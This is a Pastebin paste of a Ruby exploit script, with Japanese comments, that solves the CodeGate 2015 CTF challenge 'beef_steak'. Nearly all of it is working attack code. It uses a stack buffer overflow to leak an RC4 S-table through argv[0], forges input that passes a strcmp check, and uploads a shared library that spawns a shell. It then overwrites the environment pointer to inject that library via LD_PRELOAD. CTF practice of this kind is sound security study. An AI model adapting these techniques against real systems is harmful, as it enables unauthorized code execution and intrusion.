SHARE
TWEET

CodeGate2015 beef_steak

encry1024 Feb 2nd, 2016 113 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # coding: ascii-8bit
  2. require 'ctf.rb'
  3. require 'hexdump'
  4.  
  5. # Keyword
  6. # ・StackBOF => argv[0] leak
  7. # ・Share Library Injection
  8. # ・RC4
  9.  
  10. Host = "localhost"
  11. Port = 8887
  12.  
  13. def get_stable(offset = 0)
  14.   puts "[+] RC4 S table leak by argv[0] leak".colorize(:red)
  15.   Cpwn.open(Host, Port) do |c|
  16.     payload = "\x00" * 0x118          # 0にしとくと暗号かされないで済む.strlenが0を返すので
  17.     payload << p64(0x602160 + offset) # offset分足したアドレスからリークすることで"\x00"以降を抜き取る
  18.     payload << "\n"
  19.     c.send(payload)
  20.     c.recv_until("detected ***: ")
  21.     return c.recv_until(" terminated").gsub(" terminated", "")
  22.   end
  23. end
  24.  
  25. # RC4の処理をそのまま記述
  26. def rc4_prga(size, stable_origin)
  27.   stable = Marshal.load(Marshal.dump(stable_origin)) # stabeleを使い回すためにコピーを作った
  28.   i, j, output = 0, 0, ""
  29.   size.times do
  30.     i = (i + 1) % 256
  31.     j = (j + stable[i]) % 256
  32.     stable[j], stable[i] = stable[i], stable[j]
  33.     c = stable[(stable[i] + stable[j]) % 256]
  34.     output << c.chr
  35.   end
  36.   output
  37. end
  38.  
  39. def rc4(s1, stable)
  40.   s2 = rc4_prga(s1.length, stable)
  41.   xored = ""
  42.   s1.length.times do |i|
  43.     xored << (s1[i].ord ^ s2[i].ord).chr
  44.   end
  45.   return xored
  46. end
  47.  
  48.  
  49. # argv[0] leakでは"\x00"で途切れてしまうので, \x00を追加したのち
  50. # もう一度その長さ分足したアドレスからleakしている.
  51. stable =  get_stable(0)
  52. stable << "\x00"
  53. stable << get_stable(stable.length)
  54. Hexdump.dump(stable)
  55. stable = stable.chars.map(&:ord)
  56.  
  57.  
  58. Cipher = p64(0xf39fbfbd85aa3162, 0xe4ab23ac750c028a, 0x61c9bdef7a25c582)
  59.  
  60. Cpwn.open(Host, Port) do |c|
  61.  
  62.   # 0x400c5b <main+318>: call   0x400840 <strcmp@plt>
  63.   # arg[0]: 0x602120 --> output
  64.   # arg[1]: 0x400da6 --> 0xf39fbfbd85aa3162
  65.   # 0x400da6:       0xf39fbfbd85aa3162      0xe4ab23ac750c028
  66.   # 0x400db6:       0x61c9bdef7a25c582      
  67.  
  68.   buf = rc4(Cipher, stable)
  69.   c.send(buf + "\n")
  70.   puts c.recv_until("message")
  71.   c.send(`cat mylib.so`)       # upload shared library(shellを起動する)
  72. end
  73.  
  74.  
  75. Cpwn.open(Host, Port) do |c|
  76.  
  77.   # c.debug = true
  78.   # envp[0] : 0x128
  79.  
  80.   # 実行中のプログラムでLD_PRELPAD=./messageに設定する
  81.   buf = rc4(Cipher+"\0\0"+"LD_PRELOAD=./message\0", stable) + "\0"
  82.   buf << " " * (0x128 - buf.length)
  83.   buf << p64(0x60213a, 0x0)
  84.   buf << "\n"
  85.  
  86.   c.send(buf)
  87.   puts c.recv_until("message")
  88.   c.hacked
  89. end
RAW Paste Data
Top